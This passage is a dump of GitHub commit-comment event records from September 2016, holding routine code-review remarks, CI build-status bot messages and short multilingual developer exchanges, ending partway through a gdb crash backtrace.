{"id":"4638998168","type":"CommitCommentEvent","actor":{"login":"sranso"},"repo":{"name":"polypmer/fenestrate"},"payload":{"comment":{"id":19228587,"position":null,"line":null,"path":null,"commit_id":"0df406eb5e5c955b744c1a6a88f83d516e73caad","created_at":"2016-09-29T18:16:04Z","updated_at":"2016-09-29T18:16:04Z","body":"ha! so simple ;) glad you figured it out"}},"created_at":"2016-09-29T18:16:04Z"}
{"id":"4638998997","type":"CommitCommentEvent","actor":{"login":"Igorinus"},"repo":{"name":"NoffearrDeathProjecT/DeathCore"},"payload":{"comment":{"id":19228589,"position":null,"line":null,"path":null,"commit_id":"ce3045b9cf45a4802f9ce8793d934d31657d80a2","created_at":"2016-09-29T18:16:13Z","updated_at":"2016-09-29T18:16:13Z","body":"good commit this is the  most important :) first step ;)"}},"created_at":"2016-09-29T18:16:13Z"}
{"id":"4639003403","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19228594,"position":26,"line":26,"path":"client/state/states-list/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-29T18:17:00Z","updated_at":"2016-09-29T18:17:00Z","body":"Honestly I don't have a strong preference, as long as its consistent and we account for it. Currently I could call `requestStatesList( 'us' )` which would cause reducer to track separately from `US` and make the state persistence invalid on the next refresh. With the current schema, I'd suggest adding `countryCode = countryCode.toUpperCase()` before dispatching or issuing any request in this function (or modify schema and `toLowerCase` if you'd rather lower case it)."}},"created_at":"2016-09-29T18:17:00Z"}
{"id":"4639007316","type":"CommitCommentEvent","actor":{"login":"MatthewWEdwards"},"repo":{"name":"MatthewWEdwards/EE442C_Project3"},"payload":{"comment":{"id":19228604,"position":null,"line":null,"path":null,"commit_id":"f6c24395c552dd78b8a77140787e929ce16723d3","created_at":"2016-09-29T18:17:43Z","updated_at":"2016-09-29T18:17:43Z","body":"This commit represents about 6 commits I had in a branch. I accidently deleted the branch, but all the work done in the branch is represented by this commit."}},"created_at":"2016-09-29T18:17:43Z"}
{"id":"4639008241","type":"CommitCommentEvent","actor":{"login":"jimmgarrido"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19228607,"position":15,"line":28,"path":"Xamarin.Forms.Platform.WinRT.Phone/WindowsPhonePlatform.cs","commit_id":"617b3371c10033058a2e622846cd6f67c252a726","created_at":"2016-09-29T18:17:54Z","updated_at":"2016-09-29T18:17:54Z","body":"We no longer need to manually calculate the area the status bar is occluding since the bounds for Page.Content already factors that in."}},"created_at":"2016-09-29T18:17:54Z"}
{"id":"4639011278","type":"CommitCommentEvent","actor":{"login":"guilhermejcgois"},"repo":{"name":"New-NC/DiscoverMovieAPI"},"payload":{"comment":{"id":19228612,"position":null,"line":null,"path":null,"commit_id":"babb4ccf78fdcfbb4377d738e5e9764d3dc2151e","created_at":"2016-09-29T18:18:27Z","updated_at":"2016-09-29T18:18:27Z","body":"KeyWordsList ao invés de possuir um ArrayList não poderia estender um?"}},"created_at":"2016-09-29T18:18:27Z"}
{"id":"4639012794","type":"CommitCommentEvent","actor":{"login":"CoolOppo"},"repo":{"name":"lucasassislar/nucleuscoop"},"payload":{"comment":{"id":19228615,"position":null,"line":null,"path":null,"commit_id":"32ba7ddc6683f0f99853422264d8d52364b41aa0","created_at":"2016-09-29T18:18:42Z","updated_at":"2016-09-29T18:18:42Z","body":"Borderaldns "}},"created_at":"2016-09-29T18:18:42Z"}
{"id":"4639015995","type":"CommitCommentEvent","actor":{"login":"JeffBusterCase"},"repo":{"name":"busting-cases/Eco-C"},"payload":{"comment":{"id":19228619,"position":17,"line":17,"path":"src/app.coffee","commit_id":"a77676a1a159c08e40f2aaee3a7e6a284af10d53","created_at":"2016-09-29T18:19:17Z","updated_at":"2016-09-29T18:19:17Z","body":"to ligado, dei uma procurada. só q n tenho maria, ou melhor n sabia q ia ser hospedo :/"}},"created_at":"2016-09-29T18:19:17Z"}
{"id":"4639019223","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228633,"position":null,"line":null,"path":null,"commit_id":"efce78bc946ce268ca9ef75a12d4f022cd1c7d4c","created_at":"2016-09-29T18:19:50Z","updated_at":"2016-09-29T18:19:50Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-29T18:19:50Z"}
{"id":"4639019869","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"redshiftrobotics/5619"},"payload":{"comment":{"id":19228637,"position":17,"line":17,"path":"CONTRIBUTING.md","commit_id":"4efcb825d96870004a6f155387c0a4cc7dc16315","created_at":"2016-09-29T18:19:56Z","updated_at":"2016-09-29T18:19:56Z","body":"You're welcome to do what you want on your team but I feel obligated to point out that this is contrary to and inconsistent with git best practices and indeed with git itself: http://chris.beams.io/posts/git-commit/#capitalize"}},"created_at":"2016-09-29T18:19:56Z"}
{"id":"4639021798","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"NoffearrDeathProjecT/DeathCore"},"payload":{"comment":{"id":19228644,"position":null,"line":null,"path":null,"commit_id":"ce3045b9cf45a4802f9ce8793d934d31657d80a2","created_at":"2016-09-29T18:20:16Z","updated_at":"2016-09-29T18:20:16Z","body":"@Igorinus Thanks for Shared Source Public 💃 \r\n"}},"created_at":"2016-09-29T18:20:16Z"}
{"id":"4639022277","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19228646,"position":null,"line":null,"path":null,"commit_id":"7860a2339de71d803a4a17dd86f095dd2723b92d","created_at":"2016-09-29T18:20:20Z","updated_at":"2016-09-29T18:20:20Z","body":"ja... geht nu!!!"}},"created_at":"2016-09-29T18:20:20Z"}
{"id":"4639028428","type":"CommitCommentEvent","actor":{"login":"jimmgarrido"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19228664,"position":5,"line":201,"path":"Xamarin.Forms.Platform.WinRT/Platform.cs","commit_id":"617b3371c10033058a2e622846cd6f67c252a726","created_at":"2016-09-29T18:21:20Z","updated_at":"2016-09-29T18:21:20Z","body":"Changed the property's name to better reflect its purpose. It was only being referenced in a couple of places so I thought it would be better to utilize the existing one instead of making a new one or using `new Rectangle(0, 0, _container.ActualWidth, _container.ActualHeight)` in several locations."}},"created_at":"2016-09-29T18:21:20Z"}
{"id":"4639028566","type":"CommitCommentEvent","actor":{"login":"kalista28"},"repo":{"name":"creativecommons/ccmf-node"},"payload":{"comment":{"id":19228665,"position":null,"line":null,"path":null,"commit_id":"0cfe21e84901c961cb7739e647d414a13e729b34","created_at":"2016-09-29T18:21:22Z","updated_at":"2016-09-29T18:21:22Z","body":"0cfe21e"}},"created_at":"2016-09-29T18:21:22Z"}
{"id":"4639029424","type":"CommitCommentEvent","actor":{"login":"Igorinus"},"repo":{"name":"NoffearrDeathProjecT/DeathCore"},"payload":{"comment":{"id":19228668,"position":null,"line":null,"path":null,"commit_id":"ce3045b9cf45a4802f9ce8793d934d31657d80a2","created_at":"2016-09-29T18:21:30Z","updated_at":"2016-09-29T18:21:30Z","body":"no problem m8 and iam Ozeneu\r\n"}},"created_at":"2016-09-29T18:21:30Z"}
{"id":"4639030105","type":"CommitCommentEvent","actor":{"login":"ctron"},"repo":{"name":"eclipse/kura"},"payload":{"comment":{"id":19228669,"position":28,"line":15,"path":"kura/org.eclipse.kura.camel/src/main/java/org/eclipse/kura/camel/component/package-info.java","commit_id":"360bc5d517986bdf8402be698324265644244327","created_at":"2016-09-29T18:21:37Z","updated_at":"2016-09-29T18:21:37Z","body":"Sorry, I don't see it."}},"created_at":"2016-09-29T18:21:37Z"}
{"id":"4639030354","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228671,"position":null,"line":null,"path":null,"commit_id":"fdf1fc1e6bc345b276d02b594f7a4bd3655daa80","created_at":"2016-09-29T18:21:39Z","updated_at":"2016-09-29T18:21:39Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T18:21:39Z"}
{"id":"4639035348","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"redshiftrobotics/5619"},"payload":{"comment":{"id":19228685,"position":6,"line":6,"path":"CONTRIBUTING.md","commit_id":"4efcb825d96870004a6f155387c0a4cc7dc16315","created_at":"2016-09-29T18:22:31Z","updated_at":"2016-09-29T18:22:31Z","body":"There's a name for this. It's called GitHub Flow: https://guides.github.com/introduction/flow/index.html"}},"created_at":"2016-09-29T18:22:31Z"}
{"id":"4639035988","type":"CommitCommentEvent","actor":{"login":"amitjoy"},"repo":{"name":"eclipse/kura"},"payload":{"comment":{"id":19228687,"position":28,"line":15,"path":"kura/org.eclipse.kura.camel/src/main/java/org/eclipse/kura/camel/component/package-info.java","commit_id":"360bc5d517986bdf8402be698324265644244327","created_at":"2016-09-29T18:22:38Z","updated_at":"2016-09-29T18:22:38Z","body":"The spelling of `implement` is misspelt"}},"created_at":"2016-09-29T18:22:38Z"}
{"id":"4639039566","type":"CommitCommentEvent","actor":{"login":"jimmgarrido"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19228694,"position":61,"line":694,"path":"Xamarin.Forms.Platform.WinRT/Platform.cs","commit_id":"617b3371c10033058a2e622846cd6f67c252a726","created_at":"2016-09-29T18:23:14Z","updated_at":"2016-09-29T18:23:14Z","body":"ActionSheets on WinRT seemed to be the only thing affected negatively by using the new bounds, so I changed it to use the previous bounds from `_page`."}},"created_at":"2016-09-29T18:23:14Z"}
{"id":"4639044579","type":"CommitCommentEvent","actor":{"login":"mkhomutov"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19228702,"position":17,"line":167,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-29T18:24:04Z","updated_at":"2016-09-29T18:24:04Z","body":"I meant rename string instead of renaming the property. in order to avoid of breaking changes"}},"created_at":"2016-09-29T18:24:04Z"}
{"id":"4639044760","type":"CommitCommentEvent","actor":{"login":"beepye"},"repo":{"name":"beepye/thewholepye_design"},"payload":{"comment":{"id":19228703,"position":15,"line":15,"path":".idea/workspace.xml","commit_id":"d45c1b84c11dd0f6d23cc740e1bf61c77e736ad0","created_at":"2016-09-29T18:24:06Z","updated_at":"2016-09-29T18:24:06Z","body":"fix this shit\r\n"}},"created_at":"2016-09-29T18:24:06Z"}
{"id":"4639046015","type":"CommitCommentEvent","actor":{"login":"tseaver"},"repo":{"name":"zopefoundation/zope.testbrowser"},"payload":{"comment":{"id":19228708,"position":null,"line":null,"path":null,"commit_id":"89661b8023f2a80e0b84501160c7c121f134aeb2","created_at":"2016-09-29T18:24:18Z","updated_at":"2016-09-29T18:24:18Z","body":"We would be better off just dropping support for Python 2.6 altogether."}},"created_at":"2016-09-29T18:24:18Z"}
{"id":"4639046594","type":"CommitCommentEvent","actor":{"login":"beepye"},"repo":{"name":"beepye/thewholepye_design"},"payload":{"comment":{"id":19228710,"position":15,"line":15,"path":".idea/workspace.xml","commit_id":"d45c1b84c11dd0f6d23cc740e1bf61c77e736ad0","created_at":"2016-09-29T18:24:25Z","updated_at":"2016-09-29T18:24:25Z","body":"fuck off dude\r\n"}},"created_at":"2016-09-29T18:24:25Z"}
{"id":"4639049813","type":"CommitCommentEvent","actor":{"login":"sharumpe"},"repo":{"name":"boxcutter/oraclelinux"},"payload":{"comment":{"id":19228713,"position":null,"line":null,"path":null,"commit_id":"e617fbaafeffd9a69038d95c60a5b4ac1d39b3d8","created_at":"2016-09-29T18:24:57Z","updated_at":"2016-09-29T18:24:57Z","body":"Apologies if this isn't the right place for this, but: why is the cmtool stage being phased out?"}},"created_at":"2016-09-29T18:24:57Z"}
{"id":"4639051969","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19228720,"position":null,"line":null,"path":null,"commit_id":"91cc4d027eee8fea5006a35fb520d2880f2b73e7","created_at":"2016-09-29T18:25:19Z","updated_at":"2016-09-29T18:25:19Z","body":"Great work :+1: "}},"created_at":"2016-09-29T18:25:19Z"}
{"id":"4639053886","type":"CommitCommentEvent","actor":{"login":"dheim"},"repo":{"name":"joachimprinzbach/TypescriptAngularSample"},"payload":{"comment":{"id":19228723,"position":null,"line":null,"path":null,"commit_id":"d18feebb5d6fdc0afcd98f42c558478198d3d861","created_at":"2016-09-29T18:25:37Z","updated_at":"2016-09-29T18:25:37Z","body":"Hallo Joachim\n\nFür mich hat der Typ diese Vorteile:\nKontrolle der korrekten Properties durch den Compiler\nCode Completion beim Einfügen der Properties\nDokumentation: der Entwickler erkennt sofort den Typ des Objekts\nEinheitlichkeit: Es ist schwierig zu unterscheiden, wo nun ein Typ nötig sein soll und wo nicht. Ich würde Object und any so wenig wie möglich brauchen.\n\nNatürlich kann ich gut damit leben, wenn du die Typisierung wieder entfernen möchtest. Dann würde ich sie aber auch im File book.component.ts entfernen, wo sie schon drin war.\n\nE Gruess\nDavid\n\n\n> On 29 Sep 2016, at 19:01, Joachim <notifications@github.com> wrote:\n> \n> Bringt der Type hier einen Mehrwert? Ich denke nicht. Daher hatte ich ihn weggelassen ;-) \n> Das ist genau der Boilerplate, den man doch vermeiden möchte - oder?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/joachimprinzbach/TypescriptAngularSample/commit/d18feebb5d6fdc0afcd98f42c558478198d3d861#commitcomment-19227469>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AHXPKPPsAO-MtDoUSiKKZOMgLp3mLoTwks5qu-7ogaJpZM4KKPKu>.\n> \n\n"}},"created_at":"2016-09-29T18:25:37Z"}
{"id":"4639057489","type":"CommitCommentEvent","actor":{"login":"emanoelopes"},"repo":{"name":"emanoelopes/cp2-rails"},"payload":{"comment":{"id":19228729,"position":null,"line":null,"path":null,"commit_id":"fc6553b7c9821897c3de8d68447aab7cefb1800f","created_at":"2016-09-29T18:26:14Z","updated_at":"2016-09-29T18:26:14Z","body":"Atualizei as gems com o comando 'bundle update', removi a versão 2.0.1 da gem Rack e permaneci com a versão 1.6.4"}},"created_at":"2016-09-29T18:26:14Z"}
{"id":"4639060866","type":"CommitCommentEvent","actor":{"login":"emanoelopes"},"repo":{"name":"emanoelopes/cp2-rails"},"payload":{"comment":{"id":19228741,"position":15,"line":68,"path":"cp2-caelum-apostila/vota_prato/config/routes.rb","commit_id":"fc6553b7c9821897c3de8d68447aab7cefb1800f","created_at":"2016-09-29T18:26:47Z","updated_at":"2016-09-29T18:26:47Z","body":"A recomendação da apostila é de usar 'match' mas dá erro. "}},"created_at":"2016-09-29T18:26:47Z"}
{"id":"4639064173","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228749,"position":null,"line":null,"path":null,"commit_id":"fdf1fc1e6bc345b276d02b594f7a4bd3655daa80","created_at":"2016-09-29T18:27:19Z","updated_at":"2016-09-29T18:27:19Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T18:27:19Z"}
{"id":"4639064609","type":"CommitCommentEvent","actor":{"login":"linuxsquad"},"repo":{"name":"linuxsquad/zabbix_mdraid"},"payload":{"comment":{"id":19228750,"position":null,"line":null,"path":null,"commit_id":"a10c344bf7fa590a518b5ea724a0d27048b6a4ba","created_at":"2016-09-29T18:27:24Z","updated_at":"2016-09-29T18:27:24Z","body":"Thanks for looking into JSON issue. I have to upload a patch dealing with last line comma. Instead of keeping counters and such, I just used SED one more time after LOOP completed to remove ','"}},"created_at":"2016-09-29T18:27:24Z"}
{"id":"4639067507","type":"CommitCommentEvent","actor":{"login":"milksob"},"repo":{"name":"KDE/kcalcore"},"payload":{"comment":{"id":19228757,"position":null,"line":null,"path":null,"commit_id":"974ae82965b8aad2a0246915ac6884ac756be04f","created_at":"2016-09-29T18:27:52Z","updated_at":"2016-09-29T18:27:52Z","body":"This is not correct, this is wrong.\r\nI mean that line endings: \"==0D=0A=\"\r\nThey should be just '='\r\nHere is the fix:\r\nhttps://git.merproject.org/mer-core/kcalcore/commit/fe425c281e305aa5cf4d802935fe94b4c49f2e1e\r\n"}},"created_at":"2016-09-29T18:27:52Z"}
{"id":"4639070006","type":"CommitCommentEvent","actor":{"login":"grosenkj"},"repo":{"name":"simpeg/simpeg"},"payload":{"comment":{"id":19228763,"position":null,"line":null,"path":null,"commit_id":"3c1c9904ca777debac1d3dbdf1131aa6bdee9db8","created_at":"2016-09-29T18:28:17Z","updated_at":"2016-09-29T18:28:17Z","body":"Thanks for this."}},"created_at":"2016-09-29T18:28:17Z"}
{"id":"4639071101","type":"CommitCommentEvent","actor":{"login":"alekszalata"},"repo":{"name":"alekszalata/KotlinAsFirst2016"},"payload":{"comment":{"id":19228767,"position":5,"line":63,"path":"src/lesson1/task1/Simple.kt","commit_id":"de6c71651476829e9058fd997447dbdc4221fb38","created_at":"2016-09-29T18:28:28Z","updated_at":"2016-09-29T18:28:28Z","body":"Михаил, я вроде исправил pom файл. Решил заново отправить задания, но не\r\nбыло никаких изменений, поэтому он не отправлял. Я в каждом уроке в не\r\nзначащих местах удалил про пробелу и отправил заново, но он отправил только\r\nэти части задач с пробелами. Не подскажите как заново полностью уроки\r\nотправить?\r\n\r\n28 сентября 2016 г., 13:55 пользователь Mikhail Glukhikh <\r\nnotifications@github.com> написал:\r\n\r\n> Алексей, вам следует создать Pull Request, чтобы отправить ваш коммит на\r\n> проверку. О том, как это сделать, подробно написано здесь\r\n> https://github.com/Kotlin-Polytech/KotlinAsFirst2016/blob/master/tutorial/\r\n> chapter00.adoc в разделе про учебный проект.\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/alekszalata/KotlinAsFirst2016/commit/de6c71651476829e9058fd997447dbdc4221fb38#commitcomment-19205527>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AVBCR-Bs7wGtu-o5CrHatFX0AirUQ3Jeks5qukeogaJpZM4KIrcj>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-29T18:28:28Z"}
{"id":"4639072006","type":"CommitCommentEvent","actor":{"login":"ctron"},"repo":{"name":"eclipse/kura"},"payload":{"comment":{"id":19228769,"position":28,"line":15,"path":"kura/org.eclipse.kura.camel/src/main/java/org/eclipse/kura/camel/component/package-info.java","commit_id":"360bc5d517986bdf8402be698324265644244327","created_at":"2016-09-29T18:28:38Z","updated_at":"2016-09-29T18:28:38Z","body":"Ah, thanks!"}},"created_at":"2016-09-29T18:28:38Z"}
{"id":"4639072275","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"NoffearrDeathProjecT/DeathCore"},"payload":{"comment":{"id":19228770,"position":null,"line":null,"path":null,"commit_id":"ce3045b9cf45a4802f9ce8793d934d31657d80a2","created_at":"2016-09-29T18:28:41Z","updated_at":"2016-09-29T18:28:41Z","body":"@Igorinus WoW 👍 "}},"created_at":"2016-09-29T18:28:41Z"}
{"id":"4639072650","type":"CommitCommentEvent","actor":{"login":"besza"},"repo":{"name":"vtan/nickel"},"payload":{"comment":{"id":19228771,"position":94,"line":135,"path":"src/Main.hs","commit_id":"c4954f577fa88a9df3484437b875a2f95f345250","created_at":"2016-09-29T18:28:45Z","updated_at":"2016-09-29T18:28:45Z","body":"In english the months June and July are not abbreviated."}},"created_at":"2016-09-29T18:28:45Z"}
{"id":"4639072692","type":"CommitCommentEvent","actor":{"login":"belyaev-mikhail"},"repo":{"name":"Kotlin-Polytech/KotlinAsFirst2016"},"payload":{"comment":{"id":19228772,"position":6,"line":150,"path":"src/lesson3/task1/Loop.kt","commit_id":"054b779f3f81a0c6b0c371d235e08d111ab64d6f","created_at":"2016-09-29T18:28:45Z","updated_at":"2016-09-29T18:28:45Z","body":"Форматирование"}},"created_at":"2016-09-29T18:28:45Z"}
{"id":"4639074069","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":19228776,"position":null,"line":null,"path":null,"commit_id":"75f23cc16cc94efd9c13838b11d96931af342c14","created_at":"2016-09-29T18:29:00Z","updated_at":"2016-09-29T18:29:00Z","body":"++"}},"created_at":"2016-09-29T18:29:00Z"}
{"id":"4639079501","type":"CommitCommentEvent","actor":{"login":"kalista28"},"repo":{"name":"gaiald/verbose-octo-goggles"},"payload":{"comment":{"id":19228783,"position":null,"line":null,"path":null,"commit_id":"e975964ccbabf5dbd9a49fd68a9b68c7c2ecb3e3","created_at":"2016-09-29T18:29:52Z","updated_at":"2016-09-29T18:29:52Z","body":"e975964"}},"created_at":"2016-09-29T18:29:52Z"}
{"id":"4639080873","type":"CommitCommentEvent","actor":{"login":"fujiy"},"repo":{"name":"DevelopersCommunity/PerformanceCounters"},"payload":{"comment":{"id":19228784,"position":32,"line":44,"path":"PerformanceCounters/PCReaderEnumerator.cs","commit_id":"20651b0a3fbeed5bb66c4ee913fd88365e0da8d0","created_at":"2016-09-29T18:30:03Z","updated_at":"2016-09-29T18:30:03Z","body":"Adicionei a flag porque depois que chama o PdhCollectQueryData e ele retorna PDH_NO_MORE_DATA, parece que perde o filtro, então o foreach retorna tudo desconsiderando as datas."}},"created_at":"2016-09-29T18:30:03Z"}
{"id":"4639083870","type":"CommitCommentEvent","actor":{"login":"jmflorezff"},"repo":{"name":"jmflorezff/femr"},"payload":{"comment":{"id":19228790,"position":null,"line":null,"path":null,"commit_id":"c87717cc81313bca07bd598c52ea99936f0753ab","created_at":"2016-09-29T18:30:30Z","updated_at":"2016-09-29T18:30:30Z","body":"This is very `bad`"}},"created_at":"2016-09-29T18:30:30Z"}
{"id":"4639083873","type":"CommitCommentEvent","actor":{"login":"RLumSK"},"repo":{"name":"R-Lum/Luminescence"},"payload":{"comment":{"id":19228791,"position":null,"line":null,"path":null,"commit_id":"5d09c5af2f981acaf5005cb7d70a261663b96f0e","created_at":"2016-09-29T18:30:30Z","updated_at":"2016-09-29T18:30:30Z","body":"Ok, thanks! Please add NEWS\r\n"}},"created_at":"2016-09-29T18:30:30Z"}
{"id":"4639084864","type":"CommitCommentEvent","actor":{"login":"cash3603"},"repo":{"name":"cash3603/Python"},"payload":{"comment":{"id":19228796,"position":null,"line":null,"path":null,"commit_id":"03b726c82a22f6bb12fe5a93e156d2e2d6124800","created_at":"2016-09-29T18:30:40Z","updated_at":"2016-09-29T18:30:40Z","body":"Corrected python code for Raspberry Pi RGB led blinking"}},"created_at":"2016-09-29T18:30:40Z"}
{"id":"4639087524","type":"CommitCommentEvent","actor":{"login":"sielay"},"repo":{"name":"IonicaBizau/medium-editor-markdown"},"payload":{"comment":{"id":19228806,"position":4,"line":3,"path":"package.json","commit_id":"e050380b53ffb68e3e64a0228889cbd37df35436","created_at":"2016-09-29T18:31:07Z","updated_at":"2016-09-29T18:31:07Z","body":"that is why I trust only CLI ;)"}},"created_at":"2016-09-29T18:31:07Z"}
{"id":"4639089090","type":"CommitCommentEvent","actor":{"login":"KarlGodt"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19228809,"position":null,"line":null,"path":null,"commit_id":"148fcbc57e5747a665fb4ee78d9a8270e28d08cd","created_at":"2016-09-29T18:31:23Z","updated_at":"2016-09-29T18:31:23Z","body":"What about to implement it then ? Like test $root && test $root != / dev/ram0 && test $force_pupmode = 3 as boot parameter ? Such pupmode boot parameter would be useful too for pupmode 12/13 or instead pfix=ram . So many people have altered the init for all possible a-zdrive , or to force pupmode=13 instead 12 , but the SSD HDD feature pupmode=3 never fixed.\nAm 22.09.2016 04:03 schrieb wdlkmpx <notifications@github.com>:the old init didn't support pupmode 3.\r\n\r\nat least i couldn't spot pupmode=3 or pumode=2 then pupmode+1, it's a mystery when that pupmode became obsoleted\r\n\r\n—You are receiving this because you are subscribed to this thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-29T18:31:23Z"}
{"id":"4639092049","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19228817,"position":17,"line":167,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-29T18:31:53Z","updated_at":"2016-09-29T18:31:53Z","body":"What string?"}},"created_at":"2016-09-29T18:31:53Z"}
{"id":"4639092624","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19228820,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T18:31:59Z","updated_at":"2016-09-29T18:31:59Z","body":"In yur previous versions, you were using\r\nconst Score Stonewall = S(16, 0); "}},"created_at":"2016-09-29T18:31:59Z"}
{"id":"4639093746","type":"CommitCommentEvent","actor":{"login":"filiperocchi"},"repo":{"name":"New-NC/DiscoverMovieAPI"},"payload":{"comment":{"id":19228821,"position":null,"line":null,"path":null,"commit_id":"babb4ccf78fdcfbb4377d738e5e9764d3dc2151e","created_at":"2016-09-29T18:32:09Z","updated_at":"2016-09-29T18:32:09Z","body":"De fato."}},"created_at":"2016-09-29T18:32:09Z"}
{"id":"4639104334","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"w3c/vr-workshop"},"payload":{"comment":{"id":19228842,"position":103,"line":103,"path":"participants.html","commit_id":"e3da4fed2534180bfde9916b3824fa944861ac44","created_at":"2016-09-29T18:33:58Z","updated_at":"2016-09-29T18:33:58Z","body":"who's this supposed to be?"}},"created_at":"2016-09-29T18:33:58Z"}
{"id":"4639109737","type":"CommitCommentEvent","actor":{"login":"JoshSmith"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19228853,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-29T18:34:55Z","updated_at":"2016-09-29T18:34:55Z","body":"Okay, will do!"}},"created_at":"2016-09-29T18:34:55Z"}
{"id":"4639111105","type":"CommitCommentEvent","actor":{"login":"msuchard"},"repo":{"name":"OHDSI/PatientLevelPrediction"},"payload":{"comment":{"id":19228857,"position":null,"line":null,"path":null,"commit_id":"f386242d49aea96f3b4c06e27e6826dbc120cb32","created_at":"2016-09-29T18:35:10Z","updated_at":"2016-09-29T18:35:10Z","body":"Now I am getting somewhere with `gdb` debugging:\r\n\r\n```\r\nThread 1 (Thread 0x7f4ad4ed6780 (LWP 9040)):\r\n#0  0x00007f4ad415b035 in raise () from /lib/x86_64-linux-gnu/libc.so.6\r\n#1  0x00007f4ad415e79b in abort () from /lib/x86_64-linux-gnu/libc.so.6\r\n#2  0x00007f4acf869bc9 in os::abort(bool) () from /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/server/libjvm.so\r\n#3  0x00007f4acf9c6acf in VMError::report_and_die() () from /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/server/libjvm.so\r\n#4  0x00007f4acf870c1c in JVM_handle_linux_signal () from /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/server/libjvm.so\r\n#5  <signal handler called>\r\n#6  0x00007f4acc8f698c in TaskScheduler (nThreads=0, end=..., begin=..., this=0x7fff79c63770) at cyclops/Thread.h:72\r\n#7  bsccs::AbstractCrossValidationDriver::doCrossValidationStep (this=0x111b9bd0, ccd=..., selector=..., allArguments=..., step=0, nThreads=0, ccdPool=..., selectorPool=..., predLogLikelihood=...) at cyclops/drivers/AbstractCrossValidationDriver.cpp:123\r\n#8  0x00007f4acc8f9205 in bsccs::AutoSearchCrossValidationDriver::doCrossValidationLoop (this=0x111b9bd0, ccd=..., selector=..., allArguments=..., nThreads=0, ccdPool=..., selectorPool=...) at cyclops/drivers/AutoSearchCrossValidationDriver.cpp:116\r\n#9  0x00007f4acc8f6119 in bsccs::AbstractCrossValidationDriver::drive (this=0x111b9bd0, ccd=..., selector=..., allArguments=...) at cyclops/drivers/AbstractCrossValidationDriver.cpp:74\r\n#10 